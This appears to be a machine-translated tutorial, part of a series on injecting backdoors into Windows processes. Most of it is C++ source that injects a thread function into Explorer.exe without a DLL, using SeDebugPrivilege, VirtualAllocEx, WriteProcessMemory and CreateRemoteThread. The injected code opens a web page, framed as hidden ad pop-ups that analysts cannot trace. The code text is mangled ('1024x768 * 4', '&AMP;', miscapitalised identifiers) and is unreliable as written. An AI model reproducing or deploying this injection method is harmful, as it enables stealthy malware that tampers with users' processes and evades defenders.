Secure Path-No DLL file for remote thread injection

Brief introduction

In the previous chapters, I introduced knowledge about remote thread injection, and implemented backdoor. dll files into the Explorer.exe to bypass the firewall bounce back door. But an. exe file always takes a. dll file when it is injected it is really troublesome, then there is no way to do not apply to the. dll file implementation injection?
The answer is yes, we can directly write functions in the thread function, and then directly inject the entire function, this method compared to DLL injection will be slightly more complex, suitable for some small volume of the program to inject. But pay attention to the problem of address relocation of dynamic link library, Because normal files typically load the Kernel32.dll file by default without loading other DLLs, and only Kernel32.dll and User32.dll files can guarantee the same load address in the local and destination processes, it is best to manually use LoadLibrary and G in remote threading functions The Etprocessaddress function forces the DLL file to load again. Visual Studio recommends turning off the compiler's "/GS" option when compiling files for such features, as well as referring to this link in other areas where you need to be aware.
The following we use this method to let Windows Explorer Explorer.exe implementation of the Web page (advertising) function, and the analyst can not be found in the program depends on the dynamic link library of our injected thread DLL file, achieve a certain hidden effect.

Code implementation

filename:injectprocess.cpp//creator:peterzheng//date:2018/8/18 0:35//Comment: Inject Process without Dll file////////////////////////////////#include <cstdio> #include <cstdlib># Include <iostream> #include <string> #include <string.h> #include <windows.h> #include < strsafe.h> #include <tlhelp32.h> #define MAX_LENGTH 50#define normal_length 20#pragma Warning (disable:4996)    Using namespace std;typedef struct _remoteparam{CHAR szoperation[normal_length];    CHAR Szaddrerss[max_length];    CHAR Szlb[normal_length];    CHAR Szfunc[normal_length];    LPVOID dwmlaadress;    LPVOID dwmgpaaddress; LPVOID dwseaddress;}     Remoteparam;dword WINAPI ThreadProc (Remoteparam *lprp) {typedef hmodule (WINAPI *mloadlibrarya) (in LPCTSTR lpfilename);    typedef FARPROC (WINAPI *mgetprocaddress) (in Hmodule hmodule, in LPCSTR lpprocname); typedef hinstance (WINAPI *mshellexecutea) (HWND hwnd, LPCSTR lpoperation, LPCSTR lPFile, LPCSTR lpparameters, LPCSTR lpdirectory, INT nshowcmd);    Mloadlibrarya MLA;    Mgetprocaddress Mgpa;    Mshellexecutea MSE;    MLA = (Mloadlibrarya) lprp->dwmlaadress;    Mgpa = (mgetprocaddress) lprp->dwmgpaaddress;    Lprp->dwseaddress = (LPVOID) Mgpa (MLA (LPRP-&GT;SZLB), lprp->szfunc);    MSE = (Mshellexecutea) lprp->dwseaddress;    MSE (null, lprp->szoperation, LPRP-&GT;SZADDRERSS, NULL, NULL, SW_SHOWNORMAL); return 0;}    DWORD GetProcessID (CHAR *processname) {PROCESSENTRY32 pe32;    pe32.dwsize = sizeof (PE32);    HANDLE Hprocesssnap = createtoolhelp32snapshot (th32cs_snapprocess, 0);        if (Hprocesssnap = = Invalid_handle_value) {printf ("CreateToolhelp32Snapshot error");    return 0;    } BOOL bprocess = Process32First (Hprocesssnap, &pe32); while (bprocess) {if (strcmp (STRUPR (Pe32.szexefile), STRUPR (ProcessName)) = = 0) return Pe32.th32proc        EssID;    bprocess = Process32Next (Hprocesssnap, &pe32); } ClOsehandle (HPROCESSSNAP); return 0;}    int Enabledebugpriv (const TCHAR *name) {HANDLE htoken;    Token_privileges TP;    LUID LUID; if (! OpenProcessToken (GetCurrentProcess (), Token_adjust_privileges |        Token_query, &htoken) {printf ("OpenProcessToken error!\n");    return 1; } if (!        Lookupprivilegevalue (NULL, Name, &luid)) {printf ("Lookupprivilege error!\n");    return 1; } TP.    Privilegecount = 1; Tp. Privileges[0].    Attributes = se_privilege_enabled; Tp. Privileges[0].    Luid = Luid; if (!  AdjustTokenPrivileges (htoken, 0, &AMP;TP, sizeof (token_privileges), NULL, NULL)) {printf ("AdjustTokenPrivileges        Error!\n ");    return 1; } return 0;}    BOOL injectprocess (const DWORD dwpid) {if (Enabledebugpriv (se_debug_name)) return FALSE;    HANDLE hWnd = OpenProcess (process_all_access, FALSE, dwpid);    if (!hwnd) return FALSE;    Remoteparam RP;    ZeroMemory (&AMP;RP, sizeof (Remoteparam)); Rp.dwmlaadress = (LPVOID)    GetProcAddress (LoadLibrary ("Kernel32.dll"), "LoadLibraryA");    Rp.dwmgpaaddress = (LPVOID) GetProcAddress (LoadLibrary ("Kernel32.dll"), "GetProcAddress");    StringCchCopy (rp.szlb, sizeof (RP.SZLB), "Shell32.dll");    StringCchCopy (Rp.szfunc, sizeof (Rp.szfunc), "Shellexecutea");    StringCchCopy (Rp.szaddrerss, sizeof (RP.SZADDRERSS), "https://www.baidu.com");    StringCchCopy (rp.szoperation, sizeof (rp.szoperation), "open"); Remoteparam *premoteparam = (Remoteparam *) VirtualAllocEx (hWnd, 0, sizeof (remoteparam), Mem_commit |    Mem_reserve, Page_execute_readwrite);    if (!premoteparam) return FALSE; if (!    WriteProcessMemory (HWnd, Premoteparam, &AMP;RP, sizeof (Remoteparam), 0)) return FALSE; LPVOID Premotethread = VirtualAllocEx (hWnd, 0, 1024x768 * 4, Mem_commit |    Mem_reserve, Page_execute_readwrite);    if (!premotethread) return FALSE; if (!    WriteProcessMemory (HWnd, Premotethread, &threadproc, 1024x768 * 4, 0)) return FALSE; HANDLE hthread = CreateRemoteThread (hWnd, NULL, 0, (Lpthread_start_routine) Premotethread, (LPVOID) premoteparam, 0, NULL);    if (!hthread) return FALSE; return TRUE;}    int WINAPI WinMain (_in_ hinstance hinstance, _in_opt_ hinstance hprevinstance, _in_ LPSTR lpcmdline, _in_ int nshowcmd) {    CHAR Szprocname[max_length] = "n";    StringCchCopy (Szprocname, Max_length, "Explorer.exe");    Injectprocess (GetProcessID (szprocname));    ExitProcess (0); return 0;}

Secure Path-no DLL file for remote thread injection